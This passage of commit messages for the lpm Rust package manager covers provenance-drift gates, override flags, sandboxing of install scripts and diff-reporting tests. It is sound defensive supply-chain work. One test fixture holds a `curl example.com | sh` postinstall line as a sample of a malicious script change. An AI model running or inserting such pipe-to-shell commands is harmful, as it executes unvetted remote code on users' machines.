matching entries, pick the lexicographic-max version string via `max_by(|(v1, _), (v2, _)| v1.cmp(v2))`. Deterministic; approximates "latest semver" for consistent-digit-width components. Documented simplification — a future phase can tighten to full semver ordering, but Chunk 3's obligation is determinism first. 7 new selector tests in `lpm-workspace`: * `provenance_reference_returns_none_for_legacy_variant` * `provenance_reference_returns_none_for_absent_name` * `provenance_reference_returns_none_when_no_entries_have_provenance` * `provenance_reference_returns_single_provenance_bearing_entry` * `provenance_reference_filters_out_legacy_entries_in_mixed_map` — safeguards the Finding-1-related behavior where a legacy binding without provenance must NOT mask a newer provenance-bearing one. * `provenance_reference_picks_lex_max_version_deterministically` — primary regression guard. Constructs a 3-entry map with distinct identities and runs the selector 8 times to exercise HashMap-hash-state variability; must always pick `2.0.0`. * `provenance_reference_handles_scoped_name_correctly` — scoped package names like `@scope/pkg@1.0.0` must split at the LAST `@`, not the leading scope `@`. ## Ancillary updates * `ProvenanceSnapshot` now derives `Default` so construction sites that only set `present` (e.g., `..Default::default()`) stay forward-compat across future field additions. * Schema tests in `lpm-workspace` renamed from `provenance_snapshot_equality_is_tuple_strict` to `provenance_snapshot_full_equality_is_tuple_strict` with a docstring clarifying that full-struct equality is used for cache round-trip verification, NOT the drift identity tuple. Prevents future confusion between schema-level `==` and comparator-level `identity_equal`. * `install.rs` drift-gate UX renders the identity as `<publisher> / <workflow_path>` plus a trailing `(ref: <ref>)` hint so reviewers can temporally place the approval without confusing the ref with identity. * `build_state.rs` + `lpm-cli/src/provenance_fetch.rs` construction sites updated to the new field names. CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`): * `cargo clippy --workspace -- -D warnings` — clean * `cargo fmt --check` — clean * `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches * `cargo build --workspace` — clean * `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast` — 3995/3995 pass, zero flakes. Focused provenance suite: 61/61 (+9 from the two fix groups). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…s + -g rejection
Wires the Phase 46 P4 provenance-drift override flags end-to-end and
extends the P3 global-install-rejection pattern to cover them.
## CLI surface
Two new clap args on `Commands::Install` (see `main.rs:218-246`):
* `--ignore-provenance-drift <PKG>` — repeatable; opts out of the
drift check for one package name while keeping every other
package's drift check live.
* `--ignore-provenance-drift-all` — blanket opt-out for this
invocation.
Per Q2 of the P4 kickoff discussion, the two flags COMPOSE rather
than being mutually exclusive: `--ignore-provenance-drift-all`
supersedes the per-package list. No clap mutex — an orchestrator
forwarding both from higher-level config doesn't trip CI. The
precedence collapses inside `DriftIgnorePolicy::from_cli`.
## Canonical policy type
New `DriftIgnorePolicy` enum in `provenance_fetch.rs`:
```
pub enum DriftIgnorePolicy {
EnforceAll, // default: no override
IgnoreNames(HashSet<String>), // per-package opt-out
IgnoreAll, // blanket opt-out
}
```
* `Default` → `EnforceAll` (derive via `#[default]`), so every
non-Install caller (add/upgrade/migrate/run/dev/deploy/doctor/
install_global/update_global) defaults to enforcing drift by
passing `DriftIgnorePolicy::default()`.
* `.ignores_all()` — drift gate short-circuits the whole `if
!used_lockfile` block when true (zero network cost).
* `.ignores_name(&str)` — per-package consultation inside the gate.
Canonicalization tests:
* `drift_ignore_policy_no_flags_enforces_all` — baseline.
* `drift_ignore_policy_per_package_collapses_into_set` — happy path
for the repeatable flag.
* `drift_ignore_policy_all_flag_alone_ignores_all` — blanket path.
* `drift_ignore_policy_all_flag_supersedes_per_package_list` — Q2
regression guard: `-all` + `<pkg>` list → blanket, not error.
* `drift_ignore_policy_empty_inputs_canonicalize_to_enforce_all` —
avoids an empty-set `IgnoreNames` that would semantically match
`EnforceAll` but obscure the signal in debug output.
## Install-gate wiring (install.rs:1718-1755)
The drift gate now consults the policy in two places:
1. **Short-circuit** before the trusted-dependencies read when
`.ignores_all()` is true. Emits a single advisory to stderr
("provenance-drift check waived by --ignore-provenance-drift-all")
so the opt-out is visible in the install log — silent skip
would hide that the user accepted a non-zero-risk identity.
2. **Per-package** inside the drift loop: before fetching the
candidate's attestation, check `.ignores_name(&p.name)` and emit
a per-package advisory ("X@Y — provenance-drift check waived by
--ignore-provenance-drift (approved reference: vZ)") before
`continue`-ing past the fetch. Skipping the fetch matters for
offline / intermittent-network installs where a waived package
wouldn't benefit from a pointless round-trip.
Footer UX extended to enumerate all three recovery paths in
narrowest-to-broadest order: re-approve via `lpm approve-builds`,
`--ignore-provenance-drift <pkg>`, `--ignore-provenance-drift-all`.
Error message's hint updated accordingly.
## Fan-out through the install pipeline
`run_with_options` / `run_add_packages` / `run_install_filtered_add`
all grow `drift_ignore_policy: DriftIgnorePolicy` at end of signature.
`run_install_filtered_add` clones the policy per targeted member in
the multi-member loop (cheap — enum + small HashSet) because each
iteration consumes the policy when calling into `run_with_options`.
Nine non-Install callers pass `DriftIgnorePolicy::default()` with
a one-line comment explaining why. Two test call sites for
`run_install_filtered_add` updated identically.
## Global-install rejection (main.rs:1576)
`validate_global_install_project_scoped_flags` gains two new
parameters mirroring the P3 `--min-release-age` rejection pattern:
```
ignore_provenance_drift: &[String],
ignore_provenance_drift_all: bool,
```
Non-empty list OR `ignore_all = true` on the `-g` path fails with:
> `--ignore-provenance-drift` / `--ignore-provenance-drift-all`
> are not supported on `lpm install -g` in Phase 46 P4 (global
> trust store is tracked for Phase 46.1). Drop the flag for
> global installs.
D13/D19 rationale: the global trust store is a separate schema
(`lpm-global/src/trusted_deps.rs`, §3.9 in the plan) that doesn't
carry `provenance_at_approval`, so the override flags have no
semantic target on the `-g` path. Reject explicitly rather than
silently drop — same safety argument the P3 reviewer made for the
cooldown flag.
Two new rejection regression tests:
* `install_global_rejects_ignore_provenance_drift_flag` — covers
the repeatable per-package variant (tests with two `<pkg>`
arguments).
* `install_global_rejects_ignore_provenance_drift_all_flag` —
covers the blanket variant.
Existing `install_global_rejects_project_scoped_yes_flag` +
`install_global_rejects_min_release_age_flag` tests updated to
pass the two new validator args (empty list + false).
## Behavioural verification
* `lpm-rs install --help` — both flags documented with full rationale.
* `lpm-rs install -g eslint --ignore-provenance-drift axios` → exit
1, error names the flag + Phase 46.1.
* `lpm-rs install -g eslint --ignore-provenance-drift-all` → exit
1, same rejection shape.
## CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`)
* `cargo clippy --workspace -- -D warnings` — clean (with two
`#[allow]` pragmas explained below).
* `cargo fmt --check` — clean.
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches.
* `cargo build --workspace` — clean.
* `cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast` — **4002/4002 pass**, zero flakes.
## Lint pragmas added
* `#[allow(clippy::too_many_arguments)]` on
`validate_global_install_project_scoped_flags` — 8 args is above
the clippy threshold but every argument is a distinct flag
surface that belongs on the validator; packaging them into a
struct would add ceremony without improving callsite clarity
(the two test callers already pass them individually for test
documentation).
* `DriftIgnorePolicy` derives `Default` via `#[default]` on the
`EnforceAll` variant (was a manual impl; clippy's
`derivable_impls` caught it).
Chunk 5 follows with the wiremock E2E suite covering the §11 P4
ship criteria + these override flags end-to-end.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
End-to-end coverage for the Phase 46 P4 drift gate + override
flags, exercising the full `lpm install` pipeline against a
wiremock-backed registry that serves BOTH the package metadata
(with `dist.attestations.url`) AND the attestation bundle itself.
Harness pattern mirrors `release_age_p3_ship_criteria.rs` with two
new pieces: (a) the bundle endpoint serves a synthetic Sigstore
bundle whose leaf cert carries a deterministic GitHub Actions OIDC
SAN URI (generated via rcgen per test), (b) the project manifest's
`trustedDependencies` map carries a populated
`provenanceAtApproval` so the drift gate has a reference to
compare against.
## §11 P4 ship criteria covered
1. **`attestation_deleted_between_approved_and_candidate_blocks`** —
the axios 1.14.1 scenario end-to-end. Approved v1.0.0 has
provenance; registry serves v1.0.1 with NO `dist.attestations`.
Install blocks with "provenance dropped" verdict.
2. **`ignore_provenance_drift_per_package_unblocks`** — same
fixture plus `--ignore-provenance-drift @lpm.dev/acme.widget`.
Drift block suppressed AND the waiver-advisory line appears
(the opt-out is audit-visible, not silent).
3. **`ignore_provenance_drift_all_unblocks`** — blanket waiver
fires at the zero-cost short-circuit; the
"waived for this install by --ignore-provenance-drift-all"
advisory appears before the per-package loop would have.
4. **`identity_changed_between_approved_and_candidate_blocks`** —
both versions carry attestations but the publisher differs
("repo moved to attacker fork" scenario). Verdict:
"publisher identity changed".
## Reviewer-flagged regression guards
5. **`legitimate_release_bump_does_not_drift`** — Finding-1 E2E
guard. v1.0.0 → v1.0.1 from the same publisher + same workflow
file necessarily differs on `workflow_ref` AND
`attestation_cert_sha256` (Fulcio's per-signing leaf). Identity-
tuple equality excludes both; install proceeds. If this test
ever regresses, every legitimate patch bump would hard-block —
catastrophic for gate usability. Guards eec6312's comparator
fix.
6. **`allow_new_alone_does_not_bypass_drift`** — D16 orthogonality
guard. Approved-present + candidate-absent scenario with just
`--allow-new` passed. P3 cooldown override MUST NOT bypass P4
drift: the two gates are orthogonal and their overrides are
scoped independently. Regression here would silently merge the
two gates and break the reviewer-surfaced "cooldown and
provenance are orthogonal signals" contract.
## Reliability guard
7. **`degraded_fetch_does_not_falsely_block`** — attestation URL
returns HTTP 500. Fetcher degrades to `Ok(None)` per the P4
offline-mode contract; comparator returns `NoDrift`; install
proceeds. A Sigstore rate-limit or transient network error
must NEVER produce a spurious drift block — this test guards
the `(Some(_), None) → NoDrift` branch in
`check_provenance_drift`.
## Zero-cost short-circuit guard
8. **`project_with_no_approvals_skips_drift_gate`** — a project
without any rich `trustedDependencies` entries must skip the
gate entirely: no `LpmRoot::from_env()` call, no
`reqwest::Client` construction, no per-package iteration. The
`-all` waive advisory must NOT fire (user didn't pass it).
Guards the Chunk 3 `has_rich_approvals` optimization.
## Harness structure
Shared fixtures (~250 LOC) + 8 focused tests (~150 LOC). Two
parameterized enums (`AttestationShape` / `AttestationResponse`)
drive the registry's response shape, so each test describes its
scenario in 3-4 lines. rcgen generates an ephemeral cert per
test — the SHA rotates as it would in production, proving the
comparator doesn't accidentally depend on cert-SHA equality.
## CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`)
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast` — **4010/4010 pass**, zero flakes. New E2E
suite: 8/8 pass in 1.74s total (each test ~1.7s for
subprocess + mock-server spinup).
## P4 status after this chunk
The P4 client-side work is feature-complete. Remaining for
ship-complete: the separate server-side registry PR that adds
`dist.signatures` + `dist.attestations` to the LPM registry's
package-metadata response (§11 P4 parallel track, out of this
branch's scope). Until that lands, LPM-registry packages will
degrade to "unknown attestation" per the Ok(None) contract — the
drift gate is still active for npm-hosted packages that already
serve `dist.attestations`.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…rt-circuit naming Two reviewer-flagged harness-strength defects in 30ae5f9, both addressed with stronger assertions or more modest claims — not production-code changes. ## Finding 1 — unblocked tests overclaimed "install proceeds" The shared `assert_drift_not_blocked` helper only checked for absence of the drift-block message. Five tests (`ignore_provenance_drift_per_package_unblocks`, `ignore_provenance_drift_all_unblocks`, `legitimate_release_bump_does_not_drift`, `degraded_fetch_does_not_falsely_block`, and the renamed no-approvals test) claimed "install proceeds" / "install unblocks" but would pass equally well if the subprocess exited non-zero for some unrelated reason (e.g., a regression in a downstream pipeline stage that leaves the drift message absent). Fix: new helper `assert_drift_not_blocked_and_install_succeeded` that composes three checks: 1. The drift-block message is absent (unchanged). 2. `status.success()` — exit 0 proves the subprocess didn't fail for any reason. 3. A post-link completion marker appears in the output (`"linked"` on the human path OR `"success":true` on the JSON path). Proves the pipeline actually reached stages AFTER the drift gate fires — the gate fires BEFORE fetch/link, so a completion marker is upstream-reliable evidence of forward progress, not merely "the drift branch didn't emit its block message." All five unblocked tests switched to the stronger helper. All 8 still pass (1.7 s each; 8 tests in 1.8 s total wall time). ## Finding 2 — "skips drift gate" test didn't actually verify the skip `project_with_no_approvals_skips_drift_gate` claimed to guard the Chunk 3 `has_rich_approvals` short-circuit optimization in `install.rs`. But that optimization is a pure internal performance fast-path: the alternative (gate enters, iterates packages, each returns `None` from `provenance_reference_for_name`, no fetch fires) produces the exact same external behavior. A runtime subprocess test cannot distinguish "fast path taken" from "slow path with no matches" without instrumentation (e.g., a `tracing` debug marker + log-capturing harness). Fix: rename the test to `project_with_no_approvals_does_not_block_on_drift` — what the assertions ACTUALLY prove. Updated the docstring to explain the previous overclaim, note that verifying the specific optimization is deferred to a future tracing-based harness, and document the observable contract this test now guards (no block + no blanket- waive advisory + install completes end-to-end). The test body itself now also uses the stronger `assert_drift_not_blocked_and_install_succeeded` helper, so it catches the Finding-1-class regression simultaneously. ## Top-of-file coverage comment updated The module docstring's test list was missing item 8 (the no- approvals case) and didn't describe the new "strong unblocked assertion" shape. Both added so the file reads coherently. ## CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`) * `cargo clippy --workspace -- -D warnings` — clean * `cargo fmt --check` — clean * `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches * `cargo build --workspace` — clean * `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast` — **4010/4010 pass**, zero flakes. * Focused suite: `cargo nextest run -p lpm-cli --test provenance_drift_p4_ship_criteria` — 8/8 pass under the tighter assertions. Production code from Chunks 1-4 is unchanged. The blocker was strictly in the ship-criteria test harness layer. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Introduces crates/lpm-sandbox with the public API that Chunks 2-6 build on without touching the call site in build.rs. No wiring yet: scripts still run exactly as they do on main, since nothing constructs a Sandbox outside the crate's own tests. Scaffolds: - SandboxSpec: package + project + host path set the platform backend needs to synthesize its profile, plus extra_write_dirs for the package.json > lpm > scripts > sandboxWriteDirs escape hatch (§9.6). All paths must be absolute; validate_spec enforces before construction. - SandboxMode: Enforce (default), LogOnly (diagnostic, explicitly non-authoritative per Chunk 4 signoff), Disabled (--unsafe-full-env --no-sandbox). Disabled always works — the escape hatch is reachable from every platform including Windows. - SandboxedCommand + SandboxStdio: platform-neutral process description so backends own the OS-level Command (macOS rewrites the program to sandbox-exec; Linux installs pre_exec). Callers never touch std::process::Command directly. - Sandbox trait: spawn() + backend_name() + mode(). Object-safe, so callers hold Box<dyn Sandbox>. - SandboxError: structured variants (UnsupportedPlatform, KernelTooOld, ProfileRenderFailed, SpawnFailed, InvalidSpec) each carry a user-facing remediation field — §12.5's escape-corpus tests in Chunk 5 assert against these. - unsupported_remediation(): single source of truth for the "sandbox unavailable on windows — Phase 46.1 …" string Chunk 4 surfaces at the CLI layer, so the doc reference and CLI surface stay in sync. - NoopSandbox: real functional backend for SandboxMode::Disabled. Runs the command with no containment; everywhere. This is the only non-stub impl in Chunk 1. - macos.rs + linux.rs: cfg-gated backend stubs per CLAUDE.md cross-platform hygiene rule. Both construct successfully so the factory contract is stable across chunks; spawn() returns ProfileRenderFailed naming the Chunk that wires the real impl. Avoids silent no-op containment on platforms that should have it. - Factory dispatch via platform_backend(): each arm is a fully cfg-gated free function, so unsupported platforms don't compile dead code from supported arms (CLAUDE.md ungated-platform-code rule). Chunk 1 ship criteria: - Crate compiles workspace-wide clippy-clean on macOS (host) and Linux (CI will confirm). ✓ cargo clippy --workspace -- -D warnings clean. - Unit tests cover SandboxSpec construction, SandboxMode properties, SandboxedCommand builder, every SandboxError variant's Display (including token-level assertions the Chunk 5 corpus will reuse), validate_spec's invariants, factory dispatch per mode + per platform, and NoopSandbox end-to-end with a trivial command. 22/22 pass. - No wiring into execute_script — build.rs unchanged. ✓ Gate status (CARGO_TARGET_DIR=/tmp/lpm-rs-phase46-p5-target): - cargo clippy --workspace -- -D warnings: clean - cargo fmt --check: clean - grep -r fancy-regex crates/*/Cargo.toml: absent - cargo build --workspace: clean - cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast: 4031 passed, 1 flake in lpm-task::perf_eval_glob_200_members_under_500us_per_call (passes isolated in 0.134s — pre-existing brittleness of the 500µs perf assertion under heavy parallel load; not introduced by this change). - cargo test -p lpm-auth x3: 47/47 deterministic under parallel test runner. Branch: phase-46-p5, cut from phase-46 at 7153e59 per signoff (P4 stays unmerged from main; P5 builds on phase-46). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Replaces build.rs's direct `Command::new("sh")` spawn on macOS with a
sandbox-exec-wrapped spawn routed through lpm_sandbox. Ship criteria
#1 (deny reads + writes outside allow list) and #2 (benign postinstall
succeeds) covered by unit tests that actually shell out to
sandbox-exec on the host. Linux stays on the Chunk 1 stub + cfg-forked
legacy path in build.rs until Chunk 3 lands landlock; non-macOS
platforms observe zero behavior change from this chunk.
SandboxMode is computed at the build call site (not encoded in
ScriptPolicyConfig) per the Chunk 2 signoff:
- default → SandboxMode::Enforce
- `--unsafe-full-env --no-sandbox` → SandboxMode::Disabled (escape
hatch; emits a loud warning banner at the call site)
- `--sandbox-log` → SandboxMode::LogOnly (strictly diagnostic —
banner explicitly tells the user a clean run is NOT a safety
signal; Chunk 4 lands the real non-enforcing backend)
`--no-sandbox` requires `--unsafe-full-env` (clap-level `requires`
attribute; using `--no-sandbox` alone errors out). `--no-sandbox`
and `--sandbox-log` are mutually exclusive (clap `conflicts_with`).
Auto-build inside `lpm install` hardcodes both to `false` — autoBuild
never bypasses containment (D20).
Sandbox crate additions:
- seatbelt.rs: renders the §9.3 Seatbelt profile per-package with
`{package_dir}/{project_dir}/{home}/{tmpdir}` interpolation.
Writable set stays narrow (§9.3 verbatim: package dir + node_modules
+ .husky + .lpm + ~/.cache + ~/.node-gyp + ~/.npm + /tmp + $TMPDIR
+ sandboxWriteDirs extras). Read set widens past the schematic §9.3
layout with the system primitives real macOS binaries need to load:
stat-the-root literal `/`, /bin + /sbin for coreutils, /System (not
just /System/Library) for dyld shared cache, /private/etc for
libc / resolver, /private/var/db/dyld for the shared cache, /dev
(read-only) for /dev/fd + stdin + stdout + stderr + tty + urandom.
Process primitives: `(allow process*)`, `(allow signal)`,
`(allow mach-lookup)`, `(allow sysctl-read)`, `(allow iokit-open)`
— all confirmed empirically necessary (deny-default blocks even
/usr/bin/true without them on recent macOS releases). Network stays
on per D3.
- config.rs: `load_sandbox_write_dirs` — the one place that reads
package.json > lpm > scripts > sandboxWriteDirs. Relative paths
resolve against project_dir; empty strings rejected (would widen
writes to whole project); non-array / non-string entries surface
as SandboxError::InvalidSpec with an actionable path to fix.
- macos.rs: SeatbeltSandbox replaces the Chunk 1 stub. `new()` renders
the profile up front (so render errors surface at construction,
not mid-spawn). `spawn()` prepends `sandbox-exec -p <profile>` to
the program+args, applies envs/cwd/stdio from the SandboxedCommand,
and sets process_group(0) on unix for kill-tree-on-timeout parity
with the pre-Phase-46 path. NoopSandbox now also sets
process_group(0) on unix so `--no-sandbox` is observably identical
to the legacy direct-spawn.
build.rs integration:
- `run` grows `no_sandbox` + `sandbox_log` params.
- Before the script loop: compute SandboxMode, emit the appropriate
warning banner, load `extra_write_dirs` once, derive `store_root`
from LpmRoot, derive `home_dir` from `dirs::home_dir()`, derive
`tmpdir` from `$TMPDIR` or `/tmp`.
- `execute_script` grows pkg_name/pkg_version/sandbox_mode/
extra_write_dirs/store_root/home_dir/tmpdir params. Env-building
(INIT_CWD + augmented PATH) is platform-neutral and happens once
per call. The spawn step is the ONE cfg-fork point:
`spawn_lifecycle_child` on macOS routes through
`lpm_sandbox::new_for_platform`; on non-macOS it runs the legacy
direct-Command path. Chunk 3 deletes the non-macOS arm.
Adjacent fix: two pre-existing `assert_eq!(x, false)` lints in
build_state.rs that clippy --all-targets surfaces on this base.
Caught because `--all-targets` wasn't on the current CI invocation;
flagged in gate summary so the crew is aware the guard is partial.
Gate status (macOS host, CARGO_TARGET_DIR=/tmp/lpm-rs-phase46-p5-target):
- cargo clippy --workspace -- -D warnings: clean
- cargo clippy --workspace --all-targets -- -D warnings: clean (after
fixing the two pre-existing build_state.rs asserts)
- cargo fmt --check: clean
- grep -r fancy-regex crates/*/Cargo.toml: absent
- cargo build --workspace: clean
- cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast: 4061 passed, 1 flake (same lpm-task::perf_eval
under-load flake as Chunk 1 — passes isolated in 0.159s, pre-existing
500µs perf-assertion brittleness)
- cargo test -p lpm-auth x3: 47/47 deterministic
- lpm-sandbox crate: 52/52 (13 new seatbelt profile tests, 10 new
config tests, 4 new macos integration tests that shell out to
sandbox-exec for real containment probes, plus the 22 lib tests
inherited from Chunk 1 with the Linux-stub assertion updated)
Ship criteria for Chunk 2:
- ✓ §11 P5 criterion #1: a forbidden-read and a forbidden-write both
fail on macOS (macos::tests::enforces_deny_default_for_forbidden_read
+ denies_write_outside_allow_list_under_enforce).
- ✓ §11 P5 criterion #2: a benign write into the package's own store
dir succeeds on macOS (macos::tests::
allows_write_into_package_dir_under_enforce +
spawns_a_trivial_benign_command_inside_its_own_package_dir).
- ✓ Linux path unchanged from pre-Phase-46 (cfg-forked legacy
Command::new path; Linux stub still returns ProfileRenderFailed
from Sandbox::spawn — guarded by linux_backend_is_still_stub_in_chunk2).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…rsion_diff)
C4 surfaces the version-diff data on the machine channel so agents
driving `lpm approve-builds` and `lpm install --json` can route by
drift dimension without re-classifying. Bumps `SCHEMA_VERSION 2 → 3`
and consolidates the per-blocked-entry JSON shape onto a single
shared helper so the install pipeline and the approve-builds command
cannot drift on the wire.
## Wire shape — version_diff (per blocked entry)
Stable contract: every `version_diff` object emits the SAME keys with
`null` for dimensions that didn't drift, so agents read with uniform
key access.
```json
"version_diff": {
"prior_version": "1.14.0",
"candidate_version": "1.14.1",
"reason": "provenance-drift", // kebab-case wire form
"script_hash_drift": false, // always bool
"behavioral_tags_added": null, // [...] when drifted, null otherwise
"behavioral_tags_removed": null,
"provenance_drift_kind": "dropped" // "identity-changed" | "dropped" | "gained" | null
}
```
`version_diff` itself is `null` when no prior approved binding exists
for the package name (first-time review). When a prior exists, the
object emits even for `reason: "no-change"` so agents can
distinguish "we found the prior at v1.14.0 and it matches" from "no
prior to compare." Same semantic as the C3 TUI: the diff is a
positive equality assertion, not the absence of comparison.
Reason wire forms (kebab-case to match `static_tier`'s convention):
- `no-change` — every dimension we can compare matches.
- `script_hash_drift` — only the script hash drifted.
- `behavioral_tag_shift` — only the behavioral-tag set drifted.
- `provenance-drift` — only the provenance identity tuple drifted.
- `multi-field-drift` — two or more dimensions drifted simultaneously.
`behavioral_tags_added: []` (vs. `null`) is semantically meaningful:
empty array means "tag dimension drifted, with only LOST changes";
null means "tag dimension didn't drift in this case." Both
preserved across the BehavioralTagShift and MultiFieldDrift variants.
## Consolidated entry helper
Pre-Chunk-4: per-entry shape was an inline `serde_json::json!{...}`
literal in three places (approve_builds.rs `blocked_to_json`, two
sites in install.rs). Chunk 4 moves the canonical shape into a
single `version_diff::blocked_to_json(blocked, &trusted)` and
delegates from each call site:
- approve_builds.rs's existing private `blocked_to_json` becomes a
thin wrapper that calls the shared helper. All four call sites
(`print_listing`, `print_summary` × 4 paths) thread `&trusted`.
- Both install.rs sites (`run_with_options` + the lockfile fast-path)
call the shared helper directly. They read `&trusted` from the
manifest via the C2 `read_trusted_deps_from_manifest` helper —
graceful degradation: when the manifest is missing/malformed,
`unwrap_or_default()` produces an empty Legacy variant and every
entry's `version_diff` is `null` (which is what an empty
`trustedDependencies` should produce anyway).
Future schema additions to the per-entry shape (P8's `approved_by`
on the binding will surface here) edit ONE site instead of three.
## print_summary signature change
`fn print_summary(... &trusted, ...)` — adds a `&TrustedDependencies`
parameter so the per-entry helper can compute version_diff for the
approved/skipped lists in --yes/interactive output. Note: this fires
post-`write_back`, so `trusted` includes the freshly-added binding
for `name@candidate_version`. The `latest_binding_for_name` selector
is strictly-less-than the candidate, so it skips the freshly-added
entry and reports the diff against the prior version — matches what
the user saw when reviewing. Documented at the call site.
## SCHEMA_VERSION bump 2 → 3
The `SCHEMA_VERSION` constant in approve_builds.rs documents the
v3 addition + the bump rule. New `schema_version_bumped_for_version_diff`
const-assert pins the bump so a future revert can't silently
downgrade the version. Pre-v3 readers ignore the new field; v3+
readers branch on `schema_version >= 3` to know when to expect it.
The two existing CLI subprocess tests in
`approve_builds_audit_regression.rs` that assert `schema_version ==
Some(2)` are updated to `Some(3)` with a comment naming both bumps
(P2 Chunk 3 → 2, P7 Chunk 4 → 3) so future readers know the
history.
## Tests
15 new unit tests in `version_diff::tests`:
- Wire-form pinning: `version_diff_reason_wire_strings_are_kebab_case`,
`provenance_drift_kind_wire_strings_are_kebab_case` — agents grep
on these strings, so changing them is a wire break.
- Per-variant JSON shape: `version_diff_to_json_no_change_*`,
`_script_hash_drift_alone`, `_behavioral_tag_shift_emits_arrays`,
`_behavioral_tag_shift_only_gained_still_emits_empty_lost`,
`_provenance_dropped`, `_provenance_identity_changed`,
`_provenance_gained`, `_multi_field_emits_each_dimension`,
`_multi_field_with_only_some_dimensions_nulls_others`.
- `blocked_to_json` integration: emits `null` when no prior binding;
emits `no-change` object when prior matches; emits full diff when
prior drifts.
Plus `schema_version_bumped_for_version_diff` const-assert.
## Local gate (touched crates)
```
cargo clippy -p lpm-workspace -p lpm-cli --all-targets -- -D warnings
# clean
cargo fmt --check
# clean
cargo test -p lpm-workspace -p lpm-cli
# 88 + 1573 + 78 = 1739 passed; 0 failed
cargo test -p lpm-security -p lpm-global -p lpm-resolver
# 657 passed; 0 failed (binding consumers unaffected)
```
End-to-end JSON shape proof under a real subprocess comes in C5's
reference fixture.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…both ship criteria
C5 lands the §11 P7 ship-criteria gate at the CLI level: end-to-end
subprocess proofs that both ship criteria fire under real fd
separation, real LpmRoot resolution, and the real
store/manifest/build-state read pipeline. Mirrors the P6 Chunk 5
reference-fixture pattern so future readers have one mental model
for "Phase 46 P-N reference fixture."
## Why approve-builds path (not install)
The C2 install render path can't be exercised end-to-end without a
real `lpm install` run (lockfile-validated integrity against a real
registry — same blocker the P6 fixture commentary documents). The
diff-rendering CONTRACT is identical between the install
pre-autobuild card and the approve-builds TUI card (both call
`render_preflight_card`); the C5 fixture exercises the contract
through `lpm approve-builds --list` (human + JSON). A passing
assertion on the approve-builds output proves the install path's
rendering at the exact byte level.
Pure-decision proofs of both ship criteria already exist:
- `version_diff::tests::preflight_card_*` (C2) — pure renderer.
- `commands::install::tests::p7_post_install_hints_*` (C2) —
install enrichment decision.
C5 is the missing end-to-end subprocess proof: real binary, real
fd separation, real LpmRoot.
## Tests (6 added)
**Ship criterion 1 — script_hash drift surfaces the exact added line:**
- `p7_chunk5_script_hash_drift_surfaces_added_curl_pipe_in_approve_builds_list`
Seeds shapeshift@1.0.0 (`echo hi`) + shapeshift@2.0.0
(`echo hi\ncurl example.com | sh`). Approves v1's script_hash in
trustedDependencies. Synthesizes build-state.json with v2 blocked
+ a different script_hash. Runs `lpm approve-builds --list` as a
subprocess, asserts the diff card header (`shapeshift@2.0.0 —
changes since v1.0.0:`) AND the literal `+curl example.com | sh`
line surface in stdout. The literal-line assertion IS the ship
criterion: the user sees the malicious line verbatim, not just
"scripts changed."
- `p7_chunk5_script_hash_drift_emits_structured_version_diff_in_json`
Same scenario, runs `--json`, asserts:
- `schema_version: 3` (P7 Chunk 4 bump).
- `version_diff.reason: "script-hash-drift"`.
- `prior_version: "1.0.0"`, `candidate_version: "2.0.0"`.
- `script_hash_drift: true`, other dimension fields null.
**Ship criterion 2 — behavioral_tag delta surfaces gained tags:**
- `p7_chunk5_behavioral_tag_drift_surfaces_gained_network_and_eval_in_card`
Same script body on both sides (no script drift to mask the tag
drift). Prior had only `crypto`; candidate has `crypto + eval +
network`. Asserts `+ eval` and `+ network` both appear verbatim
in the diff card. Negative pin: NO "Script content changed"
header (the script bodies match, so a regression that emitted a
spurious script section would fail this assertion).
- `p7_chunk5_behavioral_tag_drift_emits_gained_arrays_in_json`
Same scenario with `--json`. Asserts:
- `version_diff.reason: "behavioral-tag-shift"`.
- `behavioral_tags_added: ["eval", "network"]` (sorted lex per
`active_tag_names()`).
- `behavioral_tags_removed: []` (NOT null — pins the C4 wire-
shape distinction between "tag dimension drifted with no
losses" (`[]`) and "tag dimension didn't drift" (`null`)).
**Stream-separation control:**
- `p7_chunk5_list_json_stays_parseable_with_version_diff_enrichment`
Pins that stdout under `--json` is exactly one parseable JSON
document, even when `version_diff` enrichment fires. If a
regression accidentally routed `print_version_diff_card_for_blocked`'s
`println!` through stdout in JSON mode, this parse fails with the
offending shape printed for diagnosis. Mirrors the P6 Chunk 5
stream-separation pin shape.
**No-prior-binding control:**
- `p7_chunk5_first_time_review_emits_null_version_diff_and_no_card`
First-time review (no prior binding for the same package name)
must NOT render a diff card and must emit `version_diff: null` in
JSON. Pins the C1 contract that `latest_binding_for_name` returns
None in this case, surfaced through both UX paths.
## Harness
Reuses the P6 Chunk 5 shape:
- `run_lpm` with `LPM_HOME` + `HOME` overrides isolating the test
to a tempdir; `NO_COLOR` + `LPM_NO_UPDATE_CHECK` +
`LPM_DISABLE_TELEMETRY` for deterministic output.
- `seed_package` writes synthetic store entries; uses
`serde_json::Value::String` for postinstall-body JSON-escaping
so multi-line bodies (the scenario A v2 case) escape correctly.
- New helpers (P7-specific):
- `write_blocked_build_state` synthesizes a
`<project>/.lpm/build-state.json` with one blocked entry,
optional `behavioral_tags{,_hash}` fields. Stand-in for the
